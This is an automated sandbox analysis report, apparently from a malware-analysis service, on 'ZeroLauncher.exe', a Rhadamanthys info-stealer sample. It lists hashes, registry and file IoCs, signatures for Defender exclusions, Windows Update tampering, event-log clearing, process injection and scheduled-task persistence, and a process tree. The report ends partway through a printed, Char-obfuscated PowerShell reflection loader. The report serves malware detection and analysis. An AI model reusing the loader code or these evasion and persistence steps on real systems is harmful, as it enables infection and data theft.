Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
04-10-2024 04:59
Static task
static1
Behavioral task
behavioral1
Sample
ZeroLauncher.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ZeroLauncher.exe
Resource
win10v2004-20240802-en
General
-
Target
ZeroLauncher.exe
-
Size
19KB
-
MD5
982e4ae4559538cfb529dfaff0507880
-
SHA1
a3b0e3989d6e40792134286e40448004ebeda077
-
SHA256
95a08f9fd8741d2b265a43143289af012ca24cee776609bc79337d63988246fd
-
SHA512
35d23d332c0389b3d3e7086613e60d73c158a7dd408bc4320ccb10aba8c2755ea99bf0d484cd257d53d42a6fe95a9bab0c606e7c580039aa5334767a4096662f
-
SSDEEP
384:/LVHmcPXblyCKGK9dnORWsK7PPZzcuIYZKJHtZW39cDpbJO:/hHHPbICKJEW7PPeQKy6db
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description pid Process procid_target PID 920 created 3536 920 LicSend.exe 56 PID 920 created 3536 920 LicSend.exe 56 PID 920 created 3536 920 LicSend.exe 56 PID 920 created 3536 920 LicSend.exe 56 PID 920 created 3536 920 LicSend.exe 56 PID 4552 created 628 4552 powershell.EXE 5 -
Blocklisted process makes network request 1 IoCs
flow pid Process 11 936 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4644 powershell.exe 1576 powershell.EXE 4552 powershell.EXE 4340 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts LicSend.exe -
Sets service image path in registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\dosvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\UsoSvc\ImagePath = "C:\\Windows\\system32\\svchost.exe -k netsvcs -p" WaaSMedicAgent.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation LicCheck.exe Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation ZeroLauncher.exe -
Executes dropped EXE 4 IoCs
pid Process 1720 LicenseGet.exe 1888 LicCheck.exe 920 LicSend.exe 780 svcupdater.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 9 bitbucket.org 11 bitbucket.org -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 5 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 4828 powercfg.exe 1776 powercfg.exe 3744 powercfg.exe 1732 cmd.exe 2800 powercfg.exe -
Drops file in System32 directory 15 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\svcupdater svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 920 set thread context of 3304 920 LicSend.exe 115 PID 4552 set thread context of 1432 4552 powershell.EXE 120 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe LicSend.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 236 sc.exe 3672 sc.exe 2588 sc.exe 4176 sc.exe 1004 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svcupdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LicCheck.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LicenseGet.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.EXE -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ae-e6-97-0e-33-23\WpadDecisionReason = "1" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ae-e6-97-0e-33-23\WpadDecisionTime = 22efdf711a16db01 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ae-e6-97-0e-33-23\WpadDecision = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={FD7E0FD4-25A8-47BF-931C-B1B997EC4881}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Fri, 04 Oct 2024 05:00:37 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1728018036" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4568 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 936 powershell.exe 936 powershell.exe 4528 powershell.exe 4528 powershell.exe 1888 LicCheck.exe 1888 LicCheck.exe 920 LicSend.exe 920 LicSend.exe 4644 powershell.exe 4644 powershell.exe 920 LicSend.exe 920 LicSend.exe 920 LicSend.exe 920 LicSend.exe 920 LicSend.exe 920 LicSend.exe 4340 powershell.exe 4340 powershell.exe 920 LicSend.exe 920 LicSend.exe 4552 powershell.EXE 4552 powershell.EXE 1576 powershell.EXE 1576 powershell.EXE 4552 powershell.EXE 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe 1432 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2488 ZeroLauncher.exe Token: SeDebugPrivilege 936 powershell.exe Token: SeDebugPrivilege 4528 powershell.exe Token: SeDebugPrivilege 4644 powershell.exe Token: SeShutdownPrivilege 2800 powercfg.exe Token: SeCreatePagefilePrivilege 2800 powercfg.exe Token: SeDebugPrivilege 4340 powershell.exe Token: SeShutdownPrivilege 4828 powercfg.exe Token: SeCreatePagefilePrivilege 4828 powercfg.exe Token: SeShutdownPrivilege 1776 powercfg.exe Token: SeCreatePagefilePrivilege 1776 powercfg.exe Token: SeShutdownPrivilege 3744 powercfg.exe Token: SeCreatePagefilePrivilege 3744 powercfg.exe Token: SeIncreaseQuotaPrivilege 4340 powershell.exe Token: SeSecurityPrivilege 4340 powershell.exe Token: SeTakeOwnershipPrivilege 4340 powershell.exe Token: SeLoadDriverPrivilege 4340 powershell.exe Token: SeSystemProfilePrivilege 4340 powershell.exe Token: SeSystemtimePrivilege 4340 powershell.exe Token: SeProfSingleProcessPrivilege 4340 powershell.exe Token: SeIncBasePriorityPrivilege 4340 powershell.exe Token: SeCreatePagefilePrivilege 4340 powershell.exe Token: SeBackupPrivilege 4340 powershell.exe Token: SeRestorePrivilege 4340 powershell.exe Token: SeShutdownPrivilege 4340 powershell.exe Token: SeDebugPrivilege 4340 powershell.exe Token: SeSystemEnvironmentPrivilege 4340 powershell.exe Token: SeRemoteShutdownPrivilege 4340 powershell.exe Token: SeUndockPrivilege 4340 powershell.exe Token: SeManageVolumePrivilege 4340 powershell.exe Token: 33 4340 powershell.exe Token: 34 4340 powershell.exe Token: 35 4340 powershell.exe Token: 36 4340 powershell.exe Token: SeIncreaseQuotaPrivilege 4340 powershell.exe Token: SeSecurityPrivilege 4340 powershell.exe Token: SeTakeOwnershipPrivilege 4340 powershell.exe Token: SeLoadDriverPrivilege 4340 powershell.exe Token: SeSystemProfilePrivilege 4340 powershell.exe Token: SeSystemtimePrivilege 4340 powershell.exe Token: SeProfSingleProcessPrivilege 4340 powershell.exe Token: SeIncBasePriorityPrivilege 4340 powershell.exe Token: SeCreatePagefilePrivilege 4340 powershell.exe Token: SeBackupPrivilege 4340 powershell.exe Token: SeRestorePrivilege 4340 powershell.exe Token: SeShutdownPrivilege 4340 powershell.exe Token: SeDebugPrivilege 4340 powershell.exe Token: SeSystemEnvironmentPrivilege 4340 powershell.exe Token: SeRemoteShutdownPrivilege 4340 powershell.exe Token: SeUndockPrivilege 4340 powershell.exe Token: SeManageVolumePrivilege 4340 powershell.exe Token: 33 4340 powershell.exe Token: 34 4340 powershell.exe Token: 35 4340 powershell.exe Token: 36 4340 powershell.exe Token: SeIncreaseQuotaPrivilege 4340 powershell.exe Token: SeSecurityPrivilege 4340 powershell.exe Token: SeTakeOwnershipPrivilege 4340 powershell.exe Token: SeLoadDriverPrivilege 4340 powershell.exe Token: SeSystemProfilePrivilege 4340 powershell.exe Token: SeSystemtimePrivilege 4340 powershell.exe Token: SeProfSingleProcessPrivilege 4340 powershell.exe Token: SeIncBasePriorityPrivilege 4340 powershell.exe Token: SeCreatePagefilePrivilege 4340 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1352 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2488 wrote to memory of 936 2488 ZeroLauncher.exe 83 PID 2488 wrote to memory of 936 2488 ZeroLauncher.exe 83 PID 936 wrote to memory of 4528 936 powershell.exe 85 PID 936 wrote to memory of 4528 936 powershell.exe 85 PID 936 wrote to memory of 1720 936 powershell.exe 87 PID 936 wrote to memory of 1720 936 powershell.exe 87 PID 936 wrote to memory of 1720 936 powershell.exe 87 PID 936 wrote to memory of 1888 936 powershell.exe 88 PID 936 wrote to memory of 1888 936 powershell.exe 88 PID 936 wrote to memory of 1888 936 powershell.exe 88 PID 936 wrote to memory of 920 936 powershell.exe 89 PID 936 wrote to memory of 920 936 powershell.exe 89 PID 3172 wrote to memory of 236 3172 cmd.exe 101 PID 3172 wrote to memory of 236 3172 cmd.exe 101 PID 1732 wrote to memory of 2800 1732 cmd.exe 102 PID 1732 wrote to memory of 2800 1732 cmd.exe 102 PID 3172 wrote to memory of 3672 3172 cmd.exe 103 PID 3172 wrote to memory of 3672 3172 cmd.exe 103 PID 3172 wrote to memory of 2588 3172 cmd.exe 104 PID 3172 wrote to memory of 2588 3172 cmd.exe 104 PID 1732 wrote to memory of 4828 1732 cmd.exe 105 PID 1732 wrote to memory of 4828 1732 cmd.exe 105 PID 3172 wrote to memory of 4176 3172 cmd.exe 106 PID 3172 wrote to memory of 4176 3172 cmd.exe 106 PID 3172 wrote to memory of 1004 3172 cmd.exe 107 PID 3172 wrote to memory of 1004 3172 cmd.exe 107 PID 1732 wrote to memory of 1776 1732 cmd.exe 108 PID 1732 wrote to memory of 1776 1732 cmd.exe 108 PID 3172 wrote to memory of 4772 3172 cmd.exe 109 PID 3172 wrote to memory of 4772 3172 cmd.exe 109 PID 3172 wrote to memory of 3100 3172 cmd.exe 110 PID 3172 wrote to memory of 3100 3172 cmd.exe 110 PID 1732 wrote to memory of 3744 1732 cmd.exe 111 PID 1732 wrote to memory of 3744 1732 cmd.exe 111 PID 3172 wrote to memory of 2180 3172 cmd.exe 112 PID 3172 wrote to memory of 2180 3172 cmd.exe 112 PID 3172 wrote to memory of 4768 3172 cmd.exe 113 PID 3172 wrote to memory of 4768 3172 cmd.exe 113 PID 3172 wrote to memory of 4216 3172 cmd.exe 114 PID 3172 wrote to memory of 4216 3172 cmd.exe 114 PID 920 wrote to memory of 3304 920 LicSend.exe 115 PID 4552 wrote to memory of 1432 4552 powershell.EXE 120 PID 4552 wrote to memory of 1432 4552 powershell.EXE 120 PID 4552 wrote to memory of 1432 4552 powershell.EXE 120 PID 4552 wrote to memory of 1432 4552 powershell.EXE 120 PID 4552 wrote to memory of 1432 4552 powershell.EXE 120 PID 4552 wrote to memory of 1432 4552 powershell.EXE 120 PID 4552 wrote to memory of 1432 4552 powershell.EXE 120 PID 4552 wrote to memory of 1432 4552 powershell.EXE 120 PID 4552 wrote to memory of 1432 4552 powershell.EXE 120 PID 1432 wrote to memory of 628 1432 dllhost.exe 5 PID 1432 wrote to memory of 680 1432 dllhost.exe 7 PID 1432 wrote to memory of 976 1432 dllhost.exe 12 PID 1432 wrote to memory of 424 1432 dllhost.exe 13 PID 1432 wrote to memory of 756 1432 dllhost.exe 14 PID 1432 wrote to memory of 1036 1432 dllhost.exe 16 PID 1432 wrote to memory of 1104 1432 dllhost.exe 17 PID 1432 wrote to memory of 1112 1432 dllhost.exe 18 PID 1432 wrote to memory of 1120 1432 dllhost.exe 19 PID 1432 wrote to memory of 1192 1432 dllhost.exe 20 PID 1432 wrote to memory of 1248 1432 dllhost.exe 21 PID 1432 wrote to memory of 1320 1432 dllhost.exe 22 PID 1432 wrote to memory of 1332 1432 dllhost.exe 23 PID 1432 wrote to memory of 1448 1432 dllhost.exe 24 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:628
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:424
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a4f67632-a895-4853-926b-1866b67e8e8a}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1432
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:976
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1036
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1112
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1120 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2752
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:DEjSpcEYhCrn{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$bjZrtKuzymDTss,[Parameter(Position=1)][Type]$UcmZdGPHWc)$AgTlUxNSHDb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+'l'+''+'e'+''+'c'+'t'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+'M'+'e'+'m'+'o'+''+'r'+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+'e'+'g'+''+'a'+'te'+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](80)+'ublic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+','+[Char](65)+''+'n'+'s'+[Char](105)+''+'C'+''+'l'+'a'+[Char](115)+''+[Char](115)+',A'+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+'s'+'s'+'',[MulticastDelegate]);$AgTlUxNSHDb.DefineConstructor('R'+[Char](84)+''+'S'+'pec'+[Char](105)+''+[Char](97)+''+'l'+'Na'+[Char](109)+''+[Char](101)+''+[Char](44)+'Hi'+[Char](100)+'e'+[Char](66)+'y'+[Char](83)+'i'+'g'+''+','+''+[Char](80)+'u'+'b'+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$bjZrtKuzymDTss).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');$AgTlUxNSHDb.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+'li'+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+'S'+''+'i'+''+'g'+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+'l'+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+'r'+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$UcmZdGPHWc,$bjZrtKuzymDTss).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'time,M'+'a'+'n'+'a'+''+'g'+'ed');Write-Output 